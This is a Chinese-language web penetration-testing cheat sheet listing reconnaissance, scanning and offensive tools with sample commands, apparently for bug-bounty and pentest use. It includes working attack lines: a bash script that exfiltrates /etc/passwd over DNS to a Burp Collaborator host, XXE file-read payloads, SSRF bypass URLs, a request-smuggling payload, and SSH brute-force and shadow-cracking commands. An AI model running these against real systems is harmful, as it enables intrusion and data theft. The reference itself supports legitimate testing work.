web渗透测试网络攻击备忘单

发现

目标

https://github.com/arkadiyt/bounty-targets-data
# 包含 Hackerone 和 Bugcrowd 范围的数据转储
（即有资格获得漏洞赏金报告的网站）。

IP枚举

http://www.asnlookup.com
# 该工具利用 ASN 查找特定组织拥有的 IP 地址
（IPv4 和 IPv6）以进行侦察。

https://github.com/pielco11/fav-up
# 从 favicon 图标开始并使用 Shodan 查找真实 IP。

python3 favUp.py --favicon-file favicon.ico -sc

https://stackoverflow.com/questions/16986879/bash-script-to-list-all-ips-in-prefix
# 列出给定 CIDR 块中的所有 IP 地址

nmap -sL -n 10.10.64.0/27 | awk '/Nmap scan report/{print $NF}'

子域枚举

https://appsecco.com/books/subdomain-enumeration
# 本书旨在作为子域枚举技术的参考。

https://github.com/OWASP/Amass
# OWASP Amass 项目使用开源信息收集和主动侦察技术执行攻击面的网络映射和外部资产发现。

amass enum -passive -dir /tmp/amass_output/ -d example.com -o dir/example.com

https://github.com/projectdiscovery/subfinder
# subfinder 是一个子域发现工具，它通过使用被动在线资源来发现网站的有效子域。

subfinder -r 8.8.8.8,8.8.4.4,1.1.1.1,1.0.0.1 -t 10 -v -d example.com -o dir/example.com

https://github.com/nsonaniya2010/SubDomainizer
# SubDomainizer 是一种工具，旨在查找隐藏的子域，存在的秘密是给定 URL 中存在的网页、Github 和外部 javascript。

subfinder -r 8.8.8.8,8.8.4.4,1.1.1.1,1.0.0.1 -t 10 -v -d example.com -o dir/example.com

https://dns.bufferover.run/dns?q=example.com
# 由 DNSGrep 提供支持 ( https://github.com/erbbysam/DNSGrep )
# 用于快速搜索预先排序的DNS 名称的实用程序。
围绕 Rapid7 rdns & fdns 数据集构建。

https://crt.sh/?q=ddosi.org
# 证书搜索

https://censys.io/certificates?q=parsed.subject_dn%3AO%3DExample+Organization
#Censys 是世界上最有信誉、最详尽和最新的互联网扫描数据来源，让您一目了然。

https://www.shodan.io/search?query=ssl%3AExample
#Shodan 是世界上第一个连接互联网设备的搜索引擎。

https://fofa.so
#FOFA（Cyber​​space Assets Retrieval System）是全球数据覆盖更全的IT设备搜索引擎，
拥有更完整的全球联网IT设备DNA信息。

https://www.zoomeye.org
#ZoomEye是中国第一个世界知名的网络空间搜索引擎，由已知安全404实验室驱动。通过大量全球测绘节点，根据全球IPv4、IPv6地址和网站域名数据库，24小时不间断扫描识别多个服务端口和协议，最终绘制出整个或局部的网络空间。

https://securitytrails.com/list/email/dns-admin.example.com
# 互联网总清单，包含最全面的数据，以无与伦比的准确性提供信息。

curl --request POST --url 'https://api.securitytrails.com/v1/domains/list?apikey={API_Key}&page=1&scroll=true' --data '{"filter":{"apex_domain":"example.com"}}' | jq '.records[].hostname' | sed 's/"//g' >> subdomains.txt
curl --request POST --url 'https://api.securitytrails.com/v1/domains/list?apikey={API_Key}&page=1&scroll=true' --data '{"filter":{"whois_email":"[email protected]"}}' | jq '.records[].hostname' | sed 's/"//g' >> domains.txt

https://viewdns.info/reversewhois
# 这个免费工具将允许您查找个人或公司拥有的域名。

https://opendata.rapid7.com/
# 为研究人员和社区成员提供对 Project Sonar 数据的开放访问权限，
该项目进行互联网范围的调查，以深入了解全球常见漏洞的暴露情况。

https://github.com/ninoseki/mihari
# Mihari 是一个基于 OSINT 的持续威胁追踪框架。

Wayback 机器

https://github.com/tomnomnom/waybackurls
# 在 stdin 上接受以行分隔的域，从 Wayback Machine 中为 *.domain 获取已知 URL 并将它们输出到 stdout。

cat subdomains.txt | waybackurls > waybackurls.txt

https://github.com/tomnomnom/hacks
# Hacky 一次性脚本、测试等。

cat waybackurls.txt | go run /root/Tools/hacks/anti-burl/main.go | tee waybackurls_valid.txt

缓存

https://www.giftofspeed.com/cache-checker
# 这个工具列出了网站上哪些网页文件被缓存，哪些没有。
此外，它还会检查这些文件的缓存方法以及缓存文件的到期时间。

爬行

https://github.com/jaeles-project/gospider
# 用 Go 编写的快速网络蜘蛛。

gospider -s "https://example.com/" -o output -c 20 -d 10

密码字典列表

https://portswigger.net/bappstore/21df56baa03d499c8439018fe075d3d7
# 删除所有唯一的单词和数字以用于密码破解。

https://github.com/ameenmaali/wordlistgen
# wordlistgen 是一种传递 URL 列表并为您的单词列表返回相关 密码字典 的工具。

cat hosts.txt | wordlistgen

https://github.com/adamtlangley/gitscraper
# 一种工具，用于抓取公共 github 存储库以获取变量、文件夹和文件中的常见命名约定。

php gitscraper.php {GitHub Username} {GitHub Personal KEY}

https://github.com/danielmiessler/SecLists
# SecLists 是安全测试人员的伴侣。它是安全评估期间使用的多种类型列表的集合，收集在一个地方。列表类型包括用户名、密码、URL、敏感数据模式、fuzzing payloads、web shell 等等。

https://github.com/swisskyrepo/PayloadsAllTheThings
# 用于 Web 应用程序安全的有用payloads和绕过的列表。随意改进您的payloads和技术。

https://github.com/fuzzdb-project/fuzzdb
# FuzzDB 的创建是为了增加通过动态应用程序安全测试发现应用程序安全漏洞的可能性。

https://github.com/google/fuzzing
# 该项目旨在托管与 fuzzing 相关的教程、示例、讨论、研究提案和其他资源。

https://github.com/xyele/hackerone_wordlist
# 使用 HackerOne 漏洞赏金平台披露的报告编译的词表。

https://wordlists.assetnote.io
# 本网站为您提供最新且有效的 密码字典 ，以对抗互联网上最流行的技术。

目录暴力破解

https://github.com/ffuf/ffuf
# 用 Go 编写的快速网络模糊器。

ffuf -H 'User-Agent: Mozilla' -v -t 30 -w mydirfilelist.txt -b 'NAME1=VALUE1; NAME2=VALUE2' -u 'https://example.com/FUZZ'

https://github.com/OJ/gobuster
# Gobuster 是一种用于暴力破解的工具。

gobuster dir -a 'Mozilla' -e -k -l -t 30 -w mydirfilelist.txt -c 'NAME1=VALUE1; NAME2=VALUE2' -u 'https://example.com/'

https://github.com/tomnomnom/meg
# meg 是一种用于获取大量 URL 但对服务器仍然“很好”的工具。

meg -c 50 -H 'User-Agent: Mozilla' -s 200 weblogic.txt example.txt weblogic

https://github.com/deibit/cansina
# Cansina 是一个 Web 内容发现应用程序。

python3 cansina.py -u 'https://example.com/' -p mydirfilelist.txt --persist

https://github.com/epi052/feroxbuster
# 一个用 Rust 编写的简单、快速、递归的内容发现工具。

feroxbuster -u 'https://example.com/' -x pdf -x js,html -x php txt json,docx

参数暴力破解

https://github.com/s0md3v/Arjun
# Arjun 可以找到 URL 端点的查询参数。

arjun -u https://example.com/

https://github.com/Sh1Yo/x8
# 用 Rust 编写的隐藏参数发现套件。

x8 -u "https://example.com/" -w <wordlist>

DNS 和 HTTP 检测

https://ceye.io
# 监控服务进行安全测试。

curl http://api.ceye.io/v1/records?token={API Key}&type=dns curl http://api.ceye.io/v1/records?token={API Key}&type=http

https://portswigger.net/burp/documentation/collaborator
# Burp Collaborator 是 Burp Suite 用来帮助发现多种漏洞的网络服务。
# onsecurity.co.uk/blog/gaining-persistent-access-to-burps-collaborator-sessions

https://httpbin.org/
# 一个简单的 HTTP 请求和响应服务。

http://pingb.in
# 用于安全测试的简单 DNS 和 HTTP 服务。

https://github.com/ctxis/SnitchDNS
# SnitchDNS 是一个数据库驱动的 DNS 服务器，带有一个 Web UI，用 Python 和 Twisted 编写，这使得 DNS 管理更容易，所有配置更改都可以立即应用，而无需重新启动任何系统服务。

http://dnslog.cn
# 带有realitme 日志的简单DNS 服务器。

https://interact.projectdiscovery.io/
#Interactsh 是带外数据提取的开源解决方案，该工具旨在检测导致外部交互的错误，例如 – Blind SQLi、Blind CMDi、SSRF 等。

获取/姓名/地址/联系人/电子邮件/等。

https://hunter.io
# Hunter 可让您在几秒钟内找到电子邮件地址，并与对您的业务重要的人联系。

https://intelx.io
#Intelligence X 是一家独立的欧洲科技公司，由 Peter Kleissner 于 2018 年创立。该公司位于捷克共和国布拉格。它的任务是开发和维护搜索引擎和数据存档。

https://www.nerdydata.com
# 根据网站的技术堆栈或代码查找公司。

https://github.com/khast3x/h8mail
# h8mail 是一个电子邮件 OSINT 和漏洞追踪工具，它使用不同的漏洞和侦察服务，或本地漏洞，例如 Troy Hunt 的“Collection1”和臭名昭著的“Breach Compilation”洪流。

h8mail -t [email protected]

https://dashboard.fullcontact.com
# 我们以人为本的身份解析平台提供了推动媒体放大、全渠道测量和客户识别所需的关键情报。

https://www.peopledatalabs.com
# 我们的数据使开发人员能够大规模构建创新的、值得信赖的数据驱动产品。

https://www.social-searcher.com
# 免费社交媒体搜索引擎。

https://github.com/mxrch/GHunt
# GHunt 是一种开源情报工具，可使用电子邮件从任何 Google 帐户中提取信息。

python3 ghunt.py email [email protected]

HTML/JavaScript 注释

https://portswigger.net/support/using-burp-suites-engagement-tools
# Burp Engagement 工具

谷歌呆子

https://www.exploit-db.com/google-hacking-database
# Google 黑客数据库

内容安全策略 (CSP)

https://csp-evaluator.withgoogle.com/
# CSP Evaluator 允许开发人员和安全专家检查内容安全策略 (CSP) 是否可以有效缓解跨站点脚本攻击。

微型 URL 服务

https://www.scribd.com/doc/308659143/Cornell-Tech-Url-Shortening-Research
# Cornell Tech Url Shortening Research

https://github.com/utkusen/urlhunter
# urlhunter 是一个侦察工具，允许搜索通过缩短服务（如 bit.ly 和 goo.gl）公开的 URL。

urlhunter -keywords keywords.txt -date 2020-11-20 -o out.txt

https://shorteners.grayhatwarfare.com
# 搜索缩短网址

图形语言

https://github.com/doyensec/graph-ql
# 一个用于促进 GraphQL 技术安全审计工作的安全测试工具。

https://hackernoon.com/understanding-graphql-part-1-nxm3uv9
# 理解 GraphQL

https://graphql.org/learn/introspection/
# 向 GraphQL 模式询问它支持哪些查询的信息通常很有用。GraphQL 允许我们使用自省系统来做到这一点！

https://jondow.eu/practical-graphql-attack-vectors/
# 实用的 GraphQL 攻击向量

https://lab.wallarm.com/why-and-how-to-disable-introspection-query-for-graphql-apis/
# 为什么以及如何禁用 GraphQL API 的自省查询

https://lab.wallarm.com/securing-and-attacking-graphql-part-1-overview/
# 保护 GraphQL

https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4
#GraphQL vs REST API 模型，GraphQL 端点的常见安全测试用例.

https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
#GraphQL 常见漏洞以及如何利用它们。

一般的

https://github.com/redhuntlabs/Awesome-Asset-Discovery
# 资产发现是任何安全评估活动的初始阶段，无论是进攻性还是防御性。
随着信息技术的发展，资产的范围和定义也发生了变化。

https://spyse.com
# Spyse 拥有同类中最大的数据库，其中包含大量方便侦察的 OSINT 数据。

https://github.com/yogeshojha/rengine
# reNgine 是一个自动化侦察框架，用于在 Web 应用程序的渗透测试期间收集信息。

https://github.com/phor3nsic/favicon_hash_shodan
# 通过 favicon 搜索框架

https://github.com/righettod/website-passive-reconnaissance
# 脚本，在可能的情况下，在评估之前在网站上执行被动侦察。

枚举

指纹

https://github.com/urbanadventurer/WhatWeb
# WhatWeb 识别网站。它的目标是回答“那个网站是什么？”这个问题。WhatWeb 认可 Web 技术，包括内容管理系统 (CMS)、博客平台、统计/分析包、JavaScript 库、Web 服务器和嵌入式设备。

whatweb -a 4 -U 'Mozilla' -c 'NAME1=VALUE1; NAME2=VALUE2' -t 20 www.example.com

https://builtwith.com
# 找出构建的网站。

https://www.wappalyzer.com
# 识别网站上的技术。

https://webtechsurvey.com
# 发现一个网站是基于什么技术构建的，或者找出哪些网站使用了特定的网络技术。

https://portswigger.net/bappstore/c9fb79369b56407792a7104e3c4352fb
# 软件漏洞扫描程序 Burp 扩展

https://github.com/GrrrDog/weird_proxies
# 这是一份关于各种反向代理和相关攻击行为的备忘单。

存储桶

https://aws.amazon.com/cli/
# 列出 s3 存储桶权限和密钥

aws s3api get-bucket-acl --bucket examples3bucketname
aws s3api get-object-acl --bucket examples3bucketname --key dir/file.ext
aws s3api list-objects --bucket examples3bucketname
aws s3api list-objects-v2 --bucket examples3bucketname
aws s3api get-object --bucket examples3bucketname --key dir/file.ext localfilename.ext
aws s3api put-object --bucket examples3bucketname --key dir/file.ext --body localfilename.ext

https://github.com/eth0izzle/bucket-stream
# 通过查看证书透明度日志找到有趣的 Amazon S3 Buckets

https://buckets.grayhatwarfare.com/
# 搜索公共存储桶

https://github.com/VirtueSecurity/aws-extender
# Burp Suite 扩展，可以识别和测试 S3 存储桶

云枚举

https://github.com/andresriancho/enumerate-iam
# 找到一组 AWS 凭证，但不知道它可能具有哪些权限？

https://github.com/nccgroup/ScoutSuite
# Scout Suite 是一个开源的多云安全审计工具，可以对云环境进行安全态势评估。

https://github.com/tonablyx/prowler
# Prowler 是一个命令行工具，可帮助您进行 AWS 安全评估、审计、强化和事件响应。

https://github.com/salesforce/cloudsplaining
# Cloudsplaining 是一种 AWS IAM 安全评估工具，可识别最低权限的违规行为并生成风险优先的 HTML 报告。

https://github.com/cloudsploit/scans
#Aqua 的 CloudSploit 是一个开源项目，旨在允许检测云基础设施帐户中的安全风险，包括：亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP) )、Oracle 云基础设施 (OCI) 和 GitHub。这些脚本旨在返回一系列潜在的错误配置和安全风险。

https://github.com/RhinoSecurityLabs/pacu
# Pacu 是一个开源的 AWS 开发框架，专为针对云环境的攻击性安全测试而设计。

https://github.com/VirtueSecurity/aws-extender
# 这个 Burp Suite 扩展可以使用 boto/boto3 SDK 库识别和测试 S3 存储桶以及 Google 存储存储桶和 Azure 存储容器的常见错误配置问题。

https://github.com/irgoncalves/gcp_security
# 此存储库旨在提供 Google Cloud Security 推荐的实践、脚本等。

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
# 实例元数据是有关您的实例的数据，可用于配置或管理正在运行的实例。实例元数据分为多个类别，例如主机名、事件和安全组。

https://cloud.google.com/compute/docs/storing-retrieving-metadata
# 每个实例都将其元数据存储在元数据服务器上。您可以从实例内和从 Compute Engine API 以编程方式查询此元数据服务器。您可以查询有关实例的信息，例如实例的主机名、实例 ID、启动和关闭脚本、自定义元数据和服务帐户信息。您的实例无需任何额外授权即可自动访问元数据服务器 API。

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
# Azure 实例元数据服务 (IMDS) 提供有关当前运行的虚拟机实例的信息。您可以使用它来管理和配置您的虚拟机。此信息包括 SKU、存储、网络配置和即将发生的维护事件。

https://www.alibabacloud.com/help/doc-detail/49122.htm
# 实例元数据包括实例在阿里云中的基本信息，如实例ID、IP地址、网口控制器MAC地址（ NIC）绑定到实例和操作系统类型。

https://about.gitlab.com/blog/2020/02/12/p..s-in-google-cloud-platform/
# Google Cloud Platform 环境中权限提升和后期利用策略的教程。

容器化

https://github.com/stealthcopter/deepce
# Docker 枚举、权限提升和容器逃逸 (DEEPCE)。

视觉识别

https://github.com/FortyNorthSecurity/EyeWitness
# EyeWitness 旨在截取网站的屏幕截图，提供一些服务器标头信息，并在已知的情况下识别默认凭据。

eyewitness --web --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" --threads 10 --timeout 30 --prepend-https -f "${PWD}/subdomains.txt" -d "${PWD}/eyewitness/"

https://github.com/michenriksen/aquatone
# Aquatone 是一种跨大量主机的网站视觉检查工具，便于快速了解基于 HTTP 的攻击面。

cat targets.txt | aquatone

https://github.com/sensepost/gowitness
# gowitness 是一个用 Golang 编写的网站截图实用程序，它使用 Chrome Headless 使用命令行生成 Web 界面的屏幕截图，并带有一个方便的报告查看器来处理结果。支持 Linux 和 macOS，主要支持 Windows。

gowitness scan --cidr 192.168.0.0/24 --threads 20

扫描

静态应用安全测试

https://github.com/returntocorp/semgrep
# Semgrep 是一种快速、开源的静态分析工具，擅长表达代码标准——无需复杂查询——并在编辑、提交和 CI 时间及早发现错误。

依赖混淆

https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
# 我是如何入侵苹果、微软和其他数十家公司的。

https://github.com/dwisiswant0/nodep
# nodep 检查 npmjs、PyPI 或 RubyGems 注册表中可用的依赖包。

https://github.com/visma-prodsec/confused
# 用于检查 Python (pypi) 依赖配置中引用的私有包名称的空闲命名空间的工具，用于 Python (pypi) requirements.txt, JavaScript (npm) package.json, PHP (composer) ) composer.json 或 MVN (maven) pom.xml。

发电子邮件

https://medium.com/intigriti/how-i-hacked-h..
# 票务技巧

https://medium.com/intigriti/abusing-autoresponders-and..
# 滥用自动回复和电子邮件退回

# 发送多封电子邮件

while read i; do echo $i; echo -e "From: [email protected]\nTo: ${i}\nCc: [email protected]\nSubject: This is the subject ${i}\n\nThis is the body ${i}" | ssmtp ${i},[email protected]; done < emails.txt

搜索漏洞

https://github.com/vulnersCom/getsploit
# 受searchsploit启发的漏洞数据库的命令行搜索和下载工具。

getsploit wordpress 4.7.0

https://www.exploit-db.com/searchsploit
# 我们在 GitHub 上的漏洞利用数据库存储库中包含 searchsploit，这是漏洞利用数据库的命令行搜索工具，它还允许您随身携带漏洞利用数据库的副本，无论您身在何处走。

searchsploit -t oracle windows

https://github.com/vulmon/Vulmap
# Vulmap 是一个开源的在线本地漏洞扫描器项目。它由适用于 Windows 和 Linux 操作系统的在线本地漏洞扫描程序组成。

https://grep.app
# 搜索 50 万个 git 存储库。

https://github.com/0ang3el/aem-hacker
# 识别易受攻击的 Adob​​e Experience Manager (AEM) 网络应用程序的工具。

python3 aem_hacker.py -u https://example.com --host your_vps_hostname_ip

网页扫描

https://support.portswigger.net/customer/portal/articles/1783127-using-burp-scanner
# Burp Scanner 是一种自动查找 Web 应用程序安全漏洞的工具。

https://github.com/spinkham/skipfish
# Skipfish 是一个活跃的 Web 应用安全侦察工具。

skipfish -MEU -S dictionaries/minimal.wl -W new_dict.wl -C "AuthCookie=value" -X /logout.aspx -o output_dir http://www.example.com/

https://github.com/sullo/nikto
# Nikto 是一个开源 (GPL) 网络服务器扫描器，它对网络服务器的多个项目执行全面测试，包括超过 6700 个潜在危险的文件/程序，检查超过 1250 个的过时版本服务器，以及 270 多台服务器上的版本特定问题。它还会检查服务器配置项目，例如是否存在多个索引文件、HTTP 服务器选项，并将尝试识别已安装的 Web 服务器和软件。扫描项目和插件经常更新，可以自动更新。

nikto -ssl -host www.example.com

https://github.com/wpscanteam/wpscan
# WordPress 安全扫描器

wpscan --disable-tls-checks --ignore-main-redirect --user-agent 'Mozilla' -t 10 --force --wp-content-dir wp-content --url blog.example.com

https://github.com/droope/droopescan
# 一种基于插件的扫描器，可帮助安全研究人员识别多个 CMS 的问题。

droopescan scan drupal -u example.com

https://github.com/projectdiscovery/nuclei
# Nuclei 用于基于模板跨目标发送请求，从而导致零误报并在大量主机上提供快速扫描。

nuclei -l urls.txt -t cves/ -t files/ -o results.txt

https://github.com/six2dez/reconftw
# reconFTW 是一种工具，旨在通过运行最佳工具集来执行枚举和查找漏洞，从而对目标域执行自动侦察。

reconftw.sh -d target.com -a

https://gobies.org
#新一代网络安全技术，通过为目标建立完整的资产数据库，实现快速安全应急。

https://github.com/commixproject/commix
# 通过使用该工具，可以很容易地发现并利用某个易受攻击的参数或 HTTP 标头中的命令注入漏洞。

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

https://github.com/MrCl0wnLab/ShellShockHunter
# Shellshock，也称为 Bashdoor，是 Unix Bash shell 中的一系列安全漏洞，其中第一个漏洞于 2014 年 9 月 24 日披露。

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

https://github.com/crashbrz/WebXmlExploiter/
# WebXmlExploiter 是一种利用配置错误或路径遍历 web.xml 文件暴露的工具。

HTTP 请求走私

https://github.com/defparam/smuggler
# 一个用 Python 3 编写的 HTTP 请求走私 / Desync 测试工具。

python3 smuggler.py -q -u https://example.com/

# 通过命令行攻击 HTTPS 易受攻击的服务。当没有人相信你时，有利于坚持。

echo 'UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiB5b3VyLWxhYi1pZC53ZWItc2VjdXJpdHktYWNhZGVteS5uZXQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogNg0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCg0KMA0KDQpH' | base64 -d | timeout 1 openssl s_client -quiet -connect your-lab-id.web-security-academy.net:443 &>/dev/null

https://github.com/neex/http2smugl
# 该工具有助于检测和利用 HTTP 请求走私，以防前端服务器通过 HTTP/2 -> HTTP/1.1 转换实现。

http2smugl detect https://example.com/

https://github.com/BishopFox/h2csmuggler
# h2cSmuggler 通过与 h2c 兼容的后端服务器建立 HTTP/2 明文 (h2c) 通信，允许绕过代理规则和访问，从而通过不安全的边缘服务器 proxy_pass 配置走私 HTTP 流量控件。

h2csmuggler.py -x https://example.com/ --test

https://github.com/0ang3el/websocket-smuggle
# 通过虚假的 WebSocket 连接走私 HTTP 请求。

https://portswigger.net/web-security/request-smuggling
# HTTP 请求走私是一种干扰网站处理从一个或多个用户收到的 HTTP 请求序列方式的技术。

https://github.com/PortSwigger/http-request-smuggler
# 这是 Burp Suite 的扩展，旨在帮助您发起 HTTP 请求走私攻击，最初是在 HTTP Desync Attacks 研究期间创建的。它支持扫描请求走私漏洞，还通过为您处理繁琐的偏移调整来帮助利用。

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
# 这就是我如何能够利用某些移动设备管理 (MDM) 服务器中的 HTTP 请求走私并将任何 MDM 命令发送到任何在其上注册用于私人漏洞赏金计划的设备。

https://www.intruder.io/research/practical-http-header-smuggling
# 现代 Web 应用程序通常依赖于多个服务器的链，这些服务器将 HTTP 请求转发给彼此。这种转发造成的攻击面越来越受到关注，包括最近流行的缓存中毒和请求走私漏洞。大部分探索，尤其是最近的请求走私研究，已经开发出新方法来隐藏链中某些服务器的 HTTP 请求标头，同时让其他服务器看到它们——这种技术被称为“标头走私”。本文提出了一种识别标头走私的新技术，并演示了标头走私如何导致缓存中毒、绕过 IP 限制和请求走私。

https://docs.google.com/presentation/d/1DV-VYkoEsjFsePPCmzjeYjMxSbJ9PUH5EIN2ealhr5I/
# 两年前@albinowax 向我们展示了一种 PWN 网络应用程序的新技术，因此受到这种技术和@defparam 工具的启发，我一直在收集实现请求走私的突变。

https://github.com/GrrrDog/weird_proxies
# 这是一份关于各种反向代理和相关攻击行为的备忘单。

子域接管

https://github.com/anshumanbh/tko-subs
# 子域接管扫描器

tko-subs -data providers-data.csv -threads 20 -domains subdomains.txt

https://github.com/Ice3man543/SubOver
# Subover 是一个恶意子域接管工具，最初是用 python 编写的，但在 Golang 中从头开始重写。自从重新设计以来，它一直以速度和效率为目标。

SubOver -l subdomains.txt

SQLi（SQL 注入）

https://github.com/sqlmapproject/sqlmap
# sqlmap 是一个开源渗透测试工具，它可以自动化检测和利用 SQL 注入漏洞以及接管数据库服务器的过程。

sqlmap --force-ssl -r RAW_REQUEST.txt --user-agent='Mozilla' --batch 
sqlmap -vv -u 'https://www.example.com?id=1*' --user-agent='Mozilla' --level 5 --risk 3 --batch

存储库扫描

https://github.com/zricethezav/gitleaks
# Gitleaks 是一个 SAST 工具，用于检测 git 存储库中的硬编码秘密，如密码、api 密钥和令牌。

gitleaks --github-org=organization --threads=4 -v --disk

https://github.com/michenriksen/gitrob
# Gitrob 是一种工具，可帮助查找推送到 Github 公共存储库的潜在敏感文件。

https://github.com/dxa4481/truffleHog
# 在 git 存储库中搜索秘密，深入挖掘提交历史和分支。

https://github.com/awslabs/git-secrets
# 防止您将密码和其他敏感信息提交到 git 存储库。

https://github.com/eth0izzle/shhgit
# shhgit 通过在导致安全漏洞之前在代码中发现秘密，帮助保护具有前瞻性思维的开发、运营和安全团队。

Google Dorks 扫描

https://github.com/opsdisk/pagodo
# 这个项目的目标是开发一个被动的谷歌 dork 脚本来收集互联网上可能存在漏洞的网页和应用程序。

python3 pagodo.py -d example.com -g dorks.txt -l 50 -s -e 35.0 -j 1.1

CORS 配置错误

https://github.com/s0md3v/Corsy
# Corsy 是一个轻量级程序，可扫描 CORS 实现中的所有已知错误配置。

python3 corsy.py -u https://example.com

监控

CVE

https://www.opencve.io/
# OpenCVE（以前称为 Saucs.com）允许您订阅供应商和产品，并在 CVE 发布或更新后立即向您发送警报。

进攻

暴力破解

https://github.com/vanhauser-thc/thc-hydra
# 最大的安全漏洞之一是密码，正如每项密码安全研究显示的那样。该工具是概念代码的证明，让研究人员和安全顾问有可能展示从远程获得未经授权的系统访问是多么容易。

hydra -l root -P 10-million-password-list-top-1000.txt www.example.com -t 4 ssh

https://www.openwall.com/john/
# John the Ripper 是一个开源密码安全审计和密码恢复工具，可用于许多操作系统。

unshadow /etc/passwd /etc/shadow > mypasswd.txt 
john mypasswd.txt

https://hashcat.net/hashcat/
#Hashcat 是一款密码爆破工具。

hashcat -m 0 -a 0 hashes.txt passwords.txt

https://github.com/ustayready/fireprox
# 旋转源IP地址以绕过速率限制

数据泄漏

https://github.com/vp777/procrustes
# 一个 bash 脚本，可以自动通过 dns 泄露数据

https://github.com/sensepost/reGeorg
# reDuh 的继承者，pwn 堡垒网络服务器并通过 DMZ 创建 SOCKS 代理。枢轴和 pwn。

https://github.com/fbkcs/ThunderDNS
# 这个工具可以通过 DNS 协议转发 TCP 流量。非编译客户端+socks5 支持。

# dns
上的纯 bash 渗漏 ## 在目标服务器上执行（替换 YOURBCID）

CMD="cat /etc/passwd"
HID=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)
CMDID=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)
BC="YOURBCID.burpcollaborator.net"
D="$HID-$CMDID.$BC"
M=$($CMD 2>&1); T=${#M}; O=0; S=30; I=1; while [ "${T}" -gt "0" ]; do C=$(echo ${M:${O}:${S}}|base64); C=${C//+/_0}; C=${C//\//_1}; C=${C//=/_2}; host -t A $I.${C}.$D&>/dev/null; O=$((${O}+${S})); T=$((${T}-${S})); I=$((I+1)); done

##在攻击者机器上执行（替换YOURBIID）并提取Burp Collaborator结果

BCPURL="https://polling.burpcollaborator.net/burpresults?biid=YOURBIID"
RESULTS=$(curl -sk "${BCPURL}")

## 获取可用的 ID

echo "${RESULTS}" | jq -cM '.responses[]' | while read LINE; do if [[ $LINE == *'"protocol":"dns'* ]]; then echo ${LINE} | jq -rM '.data.subDomain' | egrep --color=never "^[[:digit:]]+\..*\..*\.$BC$"; fi; done | sed -r 's/^[[:digit:]]+\.[^.]+\.([^.]+)\..*/\1/g' | sort -u

##更新ID并获取命令结果（对每个ID重复）

ID="xxxxx-xxxxx"
echo "${RESULTS}" | jq -cM '.responses[]' | while read LINE; do if [[ $LINE == *'"protocol":"dns'* ]]; then echo ${LINE} | jq -rM '.data.subDomain' | egrep "^[[:digit:]]+\..*\..*\.$BC$"; fi; done | egrep "$ID" | sort -t. -k3 -g | sed -r 's/^[[:digit:]]+\.([^.]+)\..*/\1/g' | while read i; do i=${i//_0/+}; i=${i//_1/\/}; i=${i//_2/=}; echo ${i} | base64 -d; done

手动的

payloads

https://github.com/swisskyrepo/PayloadsAllTheThings
# PayloadsAllTheThings

https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html
# Unicode 标准化有利于绕过 WAF。

# XSS
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
# 这个跨站点脚本 (XSS) 备忘单包含许多可以帮助您绕过 WAF 和过滤器的向量。您可以通过事件、标签或浏览器选择矢量，并且每个矢量都包含概念证明。
https://www.gremwell.com/firefox-xss-302
# 强制 Firefox 在 302 重定向期间执行 XSS Payload。

# XXE
https://portswigger.net/web-security/xxe
# XML 外部实体注入（也称为 XXE）是一种 Web 安全漏洞，允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件，并与应用程序本身可以访问的任何后端或外部系统进行交互。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

https://phonexicum.github.io/infosec/xxe.html
# 信息安全 PENTEST XXE

<!DOCTYPE foo SYSTEM "http://xpto.burpcollaborator.net/xpto.dtd">

https://github.com/GoSecure/dtd-finder
# 在文件系统快照上识别 DTD 并使用这些本地 DTD 构建 XXE 有效负载。

# SSRF
https://www.blackhat.com/us-17/briefings.html#a-new-era-of-ssrf-exploiting-url-parser-in-trending-programming-languages
# 我们提出了一种新的漏洞利用技术这带来了一个全新的攻击面来绕过 SSRF（服务器端请求伪造）保护。

http://1.1.1.1&@2.2.2.2#@3.3.3.3/
http://127.0.0.1:11211:80/
http://google.com#@evil.com/
http://[email protected]:[email protected]/
http://[email protected]:80 @google.com/
http://127.0.0.1\tfoo.google.com/
http://127.0.0.1%09foo.google.com/
http://127.0.0.1%2509foo.google.com/
http://127.0.0.1:11211#@google.com:80/
http://[email protected]:[email protected]:80/
http://[email protected] @google.com:11211/

反序列化

https://github.com/joaomatosf/jexboss
# JexBoss 是一种用于测试和利用 JBoss 应用服务器和其他 Java 平台、框架、应用程序等漏洞的工具。

https://github.com/pimps/JNDI-Exploit-Kit
# 这是@welk1n ( https://github.com/welk1n/JNDI-Injection-Exploit )创建的伟大开发工具的分叉修改版本。

SSRF（服务器端请求伪造）

https://lab.wallarm.com/blind-ssrf-exploitation/
# 有SSRF这样的东西。有很多关于它的信息，但这里是我的快速总结。

https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/
# SSRF 盲链词汇表。

DNS重新绑定

http://rebind.it
